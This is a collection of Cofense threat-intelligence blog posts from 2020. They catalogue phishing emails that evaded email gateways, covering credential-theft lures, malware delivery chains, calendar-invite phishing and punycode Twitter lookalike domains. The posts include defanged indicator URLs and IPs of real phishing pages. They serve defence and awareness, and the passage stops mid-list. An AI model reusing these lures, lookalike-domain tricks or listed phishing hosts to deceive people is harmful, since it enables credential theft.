Phish Found in Proofpoint-Protected Environments – Week Ending July 26, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Reply chain attacks are of particular note this week, as attackers use existing email discussions to lend a sense of legitimacy to their phish. Cofense saw these Zombie Phish last year and they continue to find success.

phishing example of a voicemail theme credential theft

TYPE: Credential Theft

DESCRIPTION: Here’s a voicemail-themed attack that includes a partial transcript – just enough to lure the recipient into clicking. Doing so leads to a Google Forms page that captures and exfiltrates login credentials. Voicemail spoofs aren’t new. Cofense has been blogging about them for some time

example phish spoofing tax forms for credential theft

TYPE: Credential Theft

DESCRIPTION: With due dates for taxes extended thanks to the COVID-19 situation, tax-themed phish are still effective. Posing as a Human Resources representative, this phish uses Infogram URLs to capture email login credentials.

phishing example of a reply chain attack using emotet to download qakbot

TYPE: Malware – QakBot

DESCRIPTION: Over a year ago, Cofense wrote about Emotet and its use of compromised emails to perform reply-chain attacks. This example uses an attached PDF with links to a macro-laden Microsoft Office document to deliver first Emotet and then QakBot.

phishing sample poses as an invoice but links to the pyrogenic stealer malware

TYPE: Malware – Pyrogenic

DESCRIPTION: Another example of reply-chain tactics to trick a recipient into following the embedded links to the Pyrogenic Stealer malware. This one uses a finance theme spoofing an Accounts Payable department.

sample phish uses an image link to deliver agent tesla malware

TYPE: Malware – Agent Tesla

DESCRIPTION: No one wants to miss a sale, and the attackers know it. They use a quotation theme to lure the recipient into clicking the image link to download the Agent Tesla keylogger, a piece of malware we covered last year.

phishing example of a quarantine theme credential theft

TYPE: Credential Theft

DESCRIPTION: Knowing users are becoming better trained to detect phishing attempts and to rely on existing security mechanisms, the attackers behind this phish spoof an email quarantine service to encourage the recipient to click and give up their credentials. Can your users tell the difference between your organization’s quarantine and a fake?

phish sample uses covid-19 pandemic theme to perform credential theft

TYPE: Credential Theft

DESCRIPTION: This last example for the week spoofs the Human Resources department using a Coronavirus theme to encourage the recipient to click the link and give up their credentials. Cofense put together a Coronavirus InfoCenter with numerous resources to help educate your organization on these threats.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending July 19, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Phishing threat actors continue to rely on tried-and-true methods to get their attacks into user inboxes. We discussed the latest trends recently on our Phish Fryday podcast.

example phish delivers LolKek ransomware with an xlsb attachment

TYPE: Malware – LolKek

DESCRIPTION: This phish uses an order theme spoofing Salesforce.com to deliver a Microsoft Excel Binary attachment (.xlsb). Within this file, macros are designed to download and install a recently discovered form of ransomware called LolKek. Excel Binary documents aren’t as common in general usage, but come in handy when working with large files. Or malicious attachments.

sample phish delivers Remcos remote access trojan via image link

TYPE: Malware – Remcos

DESCRIPTION: This contract-themed phish delivers an image link designed to look like an attached Microsoft Office document. Instead, it downloads a document crafted to exploit CVE-2017-11882, download a VBS script, which downloads a PowerShell script. That script then unpacks and loads a DotNET Loader that runs the Remcos Remote Access Trojan. That’s a long way of saying system compromise.

phishing example spoofs world health organization to deliver credential theft link

TYPE: Credential Theft

DESCRIPTION: Taking advantage of the current pandemic, this phish spoofs the World Health Organization to convince the recipient to click the link. Doing so prompts for credentials including “Gmail, Office, Yahoo, AOL, Outlook, and ‘other’” and then directs to a Google Drive-hosted PDF. Despite the official looking sender and logo, the body is rife with grammatical errors.

phishing example performs credential theft via image link

TYPE: Credential Theft

DESCRIPTION: Claiming to provide an attached statement, this phish uses a linked URL masquerading as a PDF attachment to direct the recipient to a Microsoft SharePoint-hosted page designed to steal credentials. Cofense continues to cover the use of trusted cloud services for untrustworthy purposes.

phishing sample delivers dridex malware via zipped attached word document

TYPE: Malware – Dridex

DESCRIPTION: This invoice-themed phishing attack promises a booking invoice but delivers a macro-enabled Microsoft Word document inside a ZIP archive. Those macros lead to the installation of the Dridex malware.

phish example spoofs HR to deliver credential theft via embedded link to sharepoint

TYPE: Credential Theft

DESCRIPTION: Still getting used to remote work? Attackers hope so, attempting to trick recipients into following their trusted Microsoft SharePoint links to a nasty end. In this case, a credential harvesting page. Cofense has put together a number of tips to help you defend your remote workers.

example phish with fax theme delivers credential theft with an htm attachment

TYPE: Credential Theft

DESCRIPTION: Just the fax, ma’am. This fax-themed phish encourages the recipient to open the attached .htm file. The file is designed to look like a Microsoft login page. The attacker is hoping to capture the login credentials of the recipient.

example phish that delivers an embedded URL for credential theft

TYPE: Credential Theft

DESCRIPTION: The Coronavirus theme is still getting some mileage among attackers. This one includes an embedded URL that will try and steal credentials for “Outlook, Office365, Gmail, Yahoo, and ‘other’” services. After providing credentials, the recipient is sent to a legitimate-looking PDF in an attempt to reduce suspicion.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Invoice Themed Phishing Emails Are Spreading from Trusted Links

By: Kian Mahdavi, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) is seeing continued growth in phishing attacks which harvests users’ credentials via genuine file-sharing websites, which are found in environments protected by Proofpoint’s Secure Email Gateway (SEG). A huge factor in this campaign is the confidence users have in emails containing the “trusted” Dropbox reference.

It is tricky for SEGs to keep up with attempts to spread phishing attacks and malware via sharing services such as Dropbox, ShareFile, WeTransfer, Google Docs, Egnyte and even SharePoint. Fortunately, a few of our clients’ users reported the phishing emails via the Cofense Reporter button.

The “traditional” methodology for attackers was to “break in.” Nowadays, they easily can “login,” thanks to sharing sites.

Figure 1 – Body of email showcasing the victory of this attack tying in with user interaction

The spear phishing attack sends a link requesting users to access a purchase order form with a (.pdf) extension. Upon clicking, the attack automatically redirects the user to their default web browser, requesting to click the “Download” button. The website will begin the download inside the “Downloads” folder. Nothing sinister going on, right?

The ‘sent addresses’ TLD – “actionsportsequipment[.]com” – coincidentally relates to the nature of the client’s industry; this demonstrates the extent the attackers went to, in a bid to slip through the “secure” environment. One must question themself: “Was I expecting this transfer?” and “Am I expecting to receive a purchase order from this sender?”

Moreover, since the emails have been authenticated against Dropbox’s internal servers, the emails pass basic email security checks such as DKIM and SPF.

Figure 2 & 3 – Downloadable purchase order file

Once the download has been completed, the user is prompted to open the (.html) link assuming the “purchase order” form would appear, however upon clicking, the campaign redirects the user to a supposed “Microsoft” login page.

In this case, the attackers used the free website builder “Weebly.com” … yet another legitimate source, further deceiving the security measures in place with trusted redirect domains and IPs which will naturally continue to be white-listed and deemed “safe” since millions of users share data with one another on a daily basis.

For this reason, the presence of the padlock appears, adding not only security on both parties, but also the illusion that the website is “secure.”

Figure 5 – Phishing site built by Weebly

Once credentials have been supplied, the campaign redirects the user to the authentic ‘office[.]com’ webpage, which could even be enough to assure users it was a genuine procedure. A user’s personal data could potentially be in the hands of the threat actor, assuming they logged in with their true Microsoft credentials.

Figure 6 – Redirect to Microsoft Office webpage  

Indicators of Compromise:

Network IOC IP
hXXps://www[.]dropbox[.]com/l/AADOPQGXtuDK03QYuvJqI0MbDlDxBTV28Cs
hXXps://www[.]dropbox[.]com/l/AAAtWq-LVZcqXBnFLinUi9rB3LpEijuPo78
162[.]125[.]6[.]1
hXXps://helpsupport0ffice20[.]weebly[.]com/ 199[.]34[.]228[.]53
199[.]34[.]228[.]54

LEARN MORE about the Cofense Phishing Defense Center. See how the PDC’s managed phishing response and remediation stops the phishing attacks that elude email gateways.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending July 12, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. This week’s theme is financial – with a large number of invoice and purchase order lures designed to trick recipients into clicking links and attachments. We’ve documented these attack types for some time now.

TYPE: Credential Theft

DESCRIPTION: Mail storage-themed phish have been used for some time to frighten recipients into clicking the link so their email account isn’t suspended. This attack, in Chinese, directs the recipient to a credential harvesting page customized with the recipient’s email domain name, lending a sense of veracity to the site.

TYPE: Credential Theft

DESCRIPTION: This finance-themed attack uses the ever-popular Microsoft OneDrive to host a malicious OneNote document that steals Office365 credentials before redirecting the recipient to a real Microsoft page, delaying the recognition that they were just targeted.

TYPE: Credential Theft

DESCRIPTION: Keeping with the finance theme, this attack delivers an embedded URL that leads to a credential harvesting page. Proof that if the lure looks good, the recipient can be tricked into clicking.

TYPE: Credential Theft

DESCRIPTION: This is getting repetitive, but another finance-themed attack spoofing a popular brand to convince the recipient to click. This attack targets banking credentials, potentially giving the attackers access to the bank account of the recipient.

TYPE: Malware – Pyrogenic

DESCRIPTION: Last week’s attackers really had money on their minds. This invoice-themed attack uses image links pretending to be invoices to drive the recipient to download the Pyrogenic stealer malware.

TYPE: Malware – Agent Tesla

DESCRIPTION: This attack uses a purchase order theme to deliver an attached .html file that will direct the recipient to download the Agent Tesla malware. We discussed this malware earlier this year on our Phish Fryday podcast.

TYPE: Malware – Dridex

DESCRIPTION: Another invoice, another piece of malware. This time the attacker uses a macro-enabled Microsoft Excel file to deliver the Dridex malware. Are you sure you want to enable macros?

TYPE: Malware – Ursnif

DESCRIPTION: This Italian invoice-themed attack forces the victim through a few steps, which were designed with SEG evasion in mind. A password-protected .zip file is delivered, with password provided, which contains a macro-enabled Microsoft Office document. From there, the Ursnif malware is downloaded and deployed. Arrevaderci, baby.

TYPE: Malware – ZLoader

DESCRIPTION: A simple invoice. A simple .xls attachment. A complex attack that uses Microsoft Excel macros and a VBS downloader to install ZLoader on the recipient’s machine. We blogged about this tactic a few weeks ago.

TYPE: Malware – Agent Tesla

DESCRIPTION: Agent Tesla continues to be a popular threat delivered via phishing emails. This attack uses a purchase order theme to entice the recipient into clicking the embedded link to download this malicious keylogger extraordinaire.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending July 5, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. The majority of this week’s examples are Credential Theft, an attack type we’ve been watching grow for some time. While not a panacea, many companies are rolling out MFA solutions to reduce the risk from compromised accounts.

TYPE: Credential Theft

DESCRIPTION: This notification-themed phish spoofs a European provider of credit and payment cards to trick victims into turning over their credentials.

TYPE: Credential Theft

DESCRIPTION: This notification-themed email delivers a .htm file pretending to be a short voice message. Instead, it spoofs Microsoft URLs with the intent to harvest login credentials.

TYPE: Malware – Mass Logger

DESCRIPTION: This finance-themed attack delivers OneDrive URLs to the unsuspecting victim, leading them to download the Mass Logger malware. This malware was recently analyzed by Cofense and noted for its capabilities as well as its frequent update cycle.

TYPE: Credential Theft

DESCRIPTION: Here’s a finance-themed phishing attack that delivers attached .html files. These files spoof a well-known brand to capture corporate credentials.

TYPE: Credential Theft

DESCRIPTION: They say sharing is caring, but not when it’s a phishing attack masquerading as a Coronavirus document. This attack uses SharePoint URLs to host credential-stealing pages. Cofense has been tracking COVID-19 scams since the beginning.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending June 28, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Of note is the use of macro-enabled documents using Microsoft Office document extensions dating to versions sold prior to 2007. Organizations may want to consider ways to identify and filter these files.

TYPE: Malware – Dridex

DESCRIPTION: Macro-enabled Excel documents and Dridex malware – name a more iconic pair. This phishing attack used Microsoft Excel documents to deliver Dridex to the inbox. Just like we’ve been blogging about since 2017.

TYPE: Malware – ZLoader

DESCRIPTION: Who uses XLS files anymore? Well, attackers for one. This attack uses the long outdated file type to execute macros that download ZLoader via a VBS chain. Cofense Triage customers have been detecting and remediating attacks delivering ZLoader since 2017.

TYPE: Credential Theft

DESCRIPTION: This phish leverages a trusted cloud storage service to capture login credentials from the Danish-speaking victim. This should come as no surprise, as Cofense has been seeing the use of trusted cloud services for years.

TYPE: Malware – NetWire

DESCRIPTION: Microsoft’s Office Equation Editor vulnerability (CVE-2017-11882) has been a favorite for attackers. Discovered in 2017, malicious documents are delivered via attachment or, as in this case, embedded URL to compromise victims. This example delivers the NetWire Remote Access Trojan.

TYPE: Malware – ZLoader

DESCRIPTION: Another attack using the old XLS format with macros to deliver ZLoader. This one uses an invoice theme to trick its victims into opening the attachment.

TYPE: Malware – Agent Tesla

DESCRIPTION: This invoice-themed phish includes an embedded URL to download a .7z archive. Inside the archive is the ever-popular Agent Tesla, a top threat as recently as last year.

TYPE: Credential Theft

DESCRIPTION: While we saw plenty of malware in this week’s batch, the old standard of credential phish is still around. This profile-themed phish spoofs a state agency to capture credentials that are exfiltrated using Google forms.

TYPE: Malware – Hive

DESCRIPTION: This purchase order-themed phish delivers an embedded URL to the FireBird Remote Access Trojan variant known as Hive.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

“You’re Invited!” to Phishing Links Inside .ics Calendar Attachments

By Ashley Tran, Cofense Phishing Defense Center

Every day threat actors find more and more ingenious ways to deliver phishing emails to end users. From direct attachments to using third party document hosting sites and… calendar invitations? The Cofense Phishing Defense Center (PDC) has unearthed a new phishing campaign in multiple enterprise email environments protected by Proofpoint and Microsoft that delivers .ics calendar invite attachments containing phishing links in the body. It’s assumed that the attackers believe stuffing the URL inside a calendar invite would help avoid automated analysis.

Figure 1: Email Body

The subject of this phish is “Fraud Detection from Message Center,” reeling in curious users. The sender display name is Walker, but the email address appears to be legitimate, possibly indicating a compromised account belonging to a school district. Cofense observed the use of several compromised accounts used to send this campaign. Using a compromised real account originating from Office 365 allows the email to bypass email filters that rely on DKIM/SPF.

The story in this phish is a version of a classic lure “suspicious activity on the user’s bank account.” This attachment, however, doesn’t jibe with the ruse considering it’s a calendar invite. A more fitting lure would have been something like “I attached a meeting invite; can you please attend?” Maybe this attacker flunked out of Internet bad guy school.

Figure 2 shows what the calendar invite looks like when opened. Note that it’s hosted on the legitimate Sharepoint.com site, an issue that continues to be problematic for Microsoft.

Figure 2: Calendar invite (.ics) Attachment

Upon clicking the link in the fake invitation, a relatively simple document opens with yet another link to follow, as seen in Figure 3 below:

Figure 3: Phishing Page

If the victim follows that link, they are redirected from sharepoint.com to a phishing site hosted by Google. Clicking anywhere on the document then redirects users to a bogus phishing page seen in Figure 4.

Figure 4: Phishing Page

As shown in Figure 4, the final phishing page users are directed to is hosted on:

hXXps://storage[.]googleapis[.]com/awells-putlogs-308643420/index[.]html

This is not the first time threat actors have utilized “storage[.]googleapis[.]com” to host their phish. In fact, it is becoming increasingly common thanks to its ease of use as well as the built-in SSL certificate the domain comes with which adds the “trusty” padlock to the side of its URL.

Once redirected here from the previous SharePoint page, users are presented with a convincing Wells Fargo banking page, as seen in Figure 4. This page asks for a variety of Wells Fargo account information including login details, PIN and various account numbers along with email credentials. At surface value, it may seem excessive to request this level of information, but under the pretense of “securing” one’s account, it may not appear to be so much.

Should users provide all the requested information, they will finally be redirected to the legitimate Wells Fargo login page to make the user believe they have successfully secured their account and nothing malicious has taken place.

And to think, all of this from a simple calendar invite. It goes to show, users and their security teams must constantly maintain phishing awareness training and remain vigilant as threat actors continue to find new ways to slip past gateways right into inboxes.

Network IOCs IPs
hXXps://mko37372112-my[.]sharepoint[.]com/:b:/g/personal/admin_mko37372112_onmicrosoft_com/ERto2NKXu6NKm1rXAVz0DcMB431N0n1QoqmcqDRXnfKocA 172[.]217[.]13[.]240
hXXps://storage[.]googleapis[.]com/awells-putlogs-308643420/index[.]html 13[.]107[.]136[.]9
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending June 21, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. We are not alone in dealing with attachment issues. This week’s batch of phish contain quite a few bearing common attachments to deliver malware and steal credentials. If only there were a better way to defend ourselves.

TYPE: Malware – NanoCore

DESCRIPTION: This purchase order-themed phish delivered a .zipx attachment that was actually a RAR archive. The attackers were kind enough to instruct the recipient what software to use to access the NanoCore Remote Access Trojan within. NanoCore resurfaced in early 2018 and still reaches inboxes.

TYPE: Malware – Dridex

DESCRIPTION: A finance-themed phish uses a macro-enabled Microsoft Excel attachment to deliver the Dridex malware. Cofense was reporting on this malware back in 2015 and it still finds success despite the latest advances in perimeter technologies.

TYPE: Malware – Agent Tesla

DESCRIPTION: The delivery-themed phishing example targets organizations in Thailand promising shipping information at the embedded link. The victim will end up with a case of Agent Tesla, a keylogger (and more) that we discussed in a recent Phish Fryday podcast.

TYPE: Malware – Remcos

DESCRIPTION: This document-themed phish includes a Microsoft Word attachment that leverages a pair of Microsoft Office vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to download a DotNETLoader to install the Remcos Remote Access Trojan. Cofense has tracked the exploitation of these vulnerabilities since 2017.

TYPE: Malware – Dridex

DESCRIPTION: Pretending to be an international logisitics company with some shipment information, the attached .zip file contains a macro-enabled Microsoft Office document that displays a fake invoice while silently installing the Dridex malware.

TYPE: Malware – Ursnif

DESCRIPTION: Attackers love to leverage legitimate cloud services to make their phish more successful. This response-themed attack makes use of Firefox Send to deliver a password-protected archive containing VBScripts that will download and run the Ursnif malware.

TYPE: Malware – TrickBot

DESCRIPTION: Spoofing a state government office, this phish delivers macro-laden Microsoft Office documents via an embedded link to a SharePoint site requiring a password for access. The victim will download the TrickBot malware.

TYPE: Credential Theft

DESCRIPTION: Attackers haven’t forgotten about the Coronavirus and continue to leverage the theme to get recipients to engage. This attack delivers an HTML attachment that spoofs Adobe to steal credentials.

TYPE: Credential Theft

DESCRIPTION: Another document-themed attack delivering a web page (.htm). This one spoofs a Microsoft login page to harvest credentials.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Practice Makes Perfect

By Noah Mizell and Kyle Duncan, Cofense Phishing Defense Center

The Phishing Defense Center (PDC) has discovered two distinct phishing campaigns found in environments protected by Proofpoint that spoof Twitter by using registered fraudulent domains.

Threat actors utilize numerous attacks throughout their careers; others stick with tried-and-true attacks proven to be effective. The latter is the case in the following scenarios with these attacks coming from the same campaign based on similar tactics: registered fraudulent domains, specifically tailored sender emails, and nearly identical phishing emails and pages.

Figures 1-2: First Iteration of Attack

The subject of the phishing email is “Security alert: new or unusual login” followed by the sender email “verify[@]tlwtttierz[.]com”.  Although it is obviously not Twitter.com, it is similar to the actual name, that users may overlook due to the urgent tone.  However, users must be careful when reacting in haste, as threat actors seek to turn quick thinking against targets to steal their credentials.

The body of the email looks like a legitimate Twitter notification. Similar font type, layout, the familiar Twitter logo showing – nothing appears to be amiss. Reading the contents of the message though, users may be surprised to see there has been a new login from a new device from Spain! Supposing the user is not connected to this location, this is likely to be cause for concern. But worry not, “Twitter” has sent a handy link to secure the account in question.

Hovering over the link “Secure my account”, it shows the redirect is:

twltt%C4%99r[.]com

However once clicked, users are sent to a URL that looks like “Twitter.com”:

twlttęr[.]com

For this attack, the threat actor uses punycode to make the final URL look like “Twitter.com”. The use of punycode has been noted as an extremely easy way to make phishing URLs look very similar to the site they are impersonating. Punycode essentially takes words that cannot be written in ASCII and puts them into an ASCII encoding that browsers will understand.

For example, the URL to which the attack directs does not actually include a letter ‘e’ ASCII would understand; it uses the hexadecimal encoding ‘C4 99’ for a character that can be seen in the first URL. When the browser gets this encoding, twltt%C4%99r, it renders the string, %C4%99, to the Polish letter ę, which just so happens to look very similar to the ‘e’ we’re used to seeing in the legitimate Twitter.com URL.

Figure 3-4: Second Iteration of Attack 

Although this second attack may appear to be the same one from Figures 1-2, it is an improvement – the threat actor made minor tweaks to enhance its believability.

The subject of the email has changed: “New login from Safari on iPhone”. Like the previous attack’s subject, this is also meant to evoke a sense of urgency. This time, however, the sender email is not the obviously wrong “verify[@]tlwtttierz[.]com” but rather a more subtle “verify[@]mobiles-twitter[.]com”.

Although this email looks like an exact copy of the last attack, the threat actor added a small yet impactful detail: at the bottom they specifically reference the recipient: “We sent this email to _____”. Most users have been told to look out for generic “Dear sir/ma’am” terms in emails. If the email is not specifically addressed to the recipient, it is likely a mass mailing, perhaps with malicious intent. For most users, personalization adds legitimacy.

Like in the last attack, the threat actor included disclaimer under this hyperlink to “help” users know this is a legitimate email from Twitter. Both emails mention the display of a padlock to mean a secure and legitimate site. This padlock only shows that the website is using an active SSL certificate to signify encrypted communications between the user and the web server.  However, contrary to widespread belief, a padlock does not equal safe. The attacker is simply trying to erase any doubts about the site.

The final change of this second attack can be seen when hovering over the “Confirm my identity” hyperlink and finding a new fraudulent domain:

mobiles-twitter[.]comThis domain appears to be more legitimate than the one from the first attack, as it contains the word “twitter”. Considering mobile[.]twitter[.]com leads to the legitimate mobile version of Twitter, this “mobiles-twitter[.]com” was more than likely supposed to be a dupe.

Perhaps this attack may have intended to typosquatt to lure victims the attacker never initially targeted. Typosquatting, or URL hijacking, relies on users making small mistakes when typing a URL, whether adding a period where there was a dash or misspelling the domain. The attacker has registered that mistakenly typed out URL, so should anyone accidentally visit it they will be subject to whatever is on that page.

Figure 5: Phishing Page

As seen in Figure 5 above, users are presented with a login page for either attack, however this one is specifically for the phish located at twlttęr[.]com. This page is made to look extremely close to the current Twitter login page that can be seen on a desktop browser. The obvious difference between this phishing attack and the legitimate Twitter login page would be the URL, with its unusual letter ‘ę’, and the atypical tab icon.

This is just the first iteration of the threat actor’s attack. The second attack has an even more dismissible body email and a URL that looks closer to a legitimate URL. Regardless, it is no secret that users should pay close attention to the URLs in their address bar.

 

Network IOCs  IPs  
hXXps://mobiles-twitter[.]com/login/ 70[.]37[.]100[.]82
hXXps://twltt%C4%99r[.]com 70[.]37[.]100[.]82
hXXps://xn--twlttr-04a[.]com/login/ 70[.]37[.]100[.]82
hXXps://t[.]co/U6DLQ2B1xC

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending June 14, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. Cofense sees macro-laden attachments reaching the inbox so frequently, we did a Phish Fryday episode on the topic.

TYPE: Malware – NanoCore

DESCRIPTION: This phish spoofs an international lifestyle company to deliver a macro-laden Microsoft Publisher file. Once enabled, the macros download a series of HTA scripts to unpack enclosed .NET libraries which then unpack and run the NanoCore Remote Access Trojan. The use of Publisher files in phishing attacks is not new, as Cofense reported on its use in the Necurs botnet back in 2018.

TYPE: Credential Theft

